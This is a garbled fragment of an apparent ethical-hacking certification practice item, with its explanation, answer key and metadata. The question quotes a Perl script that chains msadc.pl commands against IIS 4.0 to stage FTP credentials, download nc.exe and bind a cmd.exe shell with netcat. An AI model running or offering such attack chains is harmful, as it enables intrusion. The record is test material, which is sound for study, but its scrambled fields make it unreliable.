The correct answer is Chained exploit. That phrase describes an exploit that uses a scripted sequence chaining multiple tools and steps such as writing temporary credential files performing FTP transfers and invoking netcat to spawn a remote shell.
Chained exploits automate and link distinct actions so an attacker can move from initial access through staging to remote command execution without manual intervention at each step. The scenario in the question describes exactly that kind of scripted multi step workflow which is the defining characteristic of a Chained exploit.
An Remote code execution exploit refers to a vulnerability that allows arbitrary code to run on a target host. That term focuses on the ability to execute code via a flaw and not on a scripted multi tool sequence. It can be used within a chain but it does not by itself describe the multi step chaining described in the question.
A Buffer overflow exploit is a specific technique that corrupts memory to gain control of execution flow. It is a class of vulnerability and exploitation method rather than an automated sequence that chains multiple tools and transfers. A buffer overflow might be one component of a larger chain but it does not match the scripted chaining behavior asked about here.
", "batch_id": "1582", "answerCode": "2", "type": "multiple-choice", "originalQuery": "A penetration tester discovered a web server running IIS 4.0 during their enumeration phase. The tester decided to use the msadc.pl attack script to execute arbitrary commands on the webserver. While the msadc.pl script is effective, and the pentester found it too monotonous to perform extended functions. During further research, the penetration tester found a perl script that runs the following msadc commands: -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- system(\"perl msadc.pl -h $host -C \\\"echo $user>>tempfile\\\"\"); system(\"perl msadc.pl -h $host -C \\\"echo $pass>>tempfile\\\"\"); system(\"perl msadc.pl -h $host -C \\\"echo bin>>tempfile\\\"\"); system(\"perl msadc.pl -h $host -C \\\"echo get nc.exe>>tempfile\\\"\"); system(\"perl msadc.pl -h $host -C \\\"echo get hacked.html>>tempfile\\\"\"); (\"perl msadc.pl -h $host -C \\\"echo quit>>tempfile\\\"\"); system(\"perl msadc.pl -h $host -C \\\"ftp \\-s\\:tempfile\\\"\"); $o=; print \"Opening FTP connection...\\n\"; system(\"perl msadc.pl -h $host -C \\\"nc -l -p $port -e cmd.exe\\\"\"); -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Which exploit type is indicated by this script?", "originalOptions": "A. Buffer overflow exploitWhen a question mentions multiple automated steps look for keywords like chained or chain and distinguish that concept from a single vulnerability term such as remote code execution or buffer overflow.
", "references": [ "https://en.wikipedia.org/wiki/Exploit_chain", "https://en.wikipedia.org/wiki/Remote_code_execution", "https://en.wikipedia.org/wiki/Buffer_overflow" ], "video_url": "https://certificationation.com/videos/others/eccouncil/ethical-hacker/eccouncil-web-server-running-iis-4-0-exam-938.html", "url": "https://certificationation.com/questions/others/eccouncil/ethical-hacker/eccouncil-web-server-running-iis-4-0-exam-938.html" }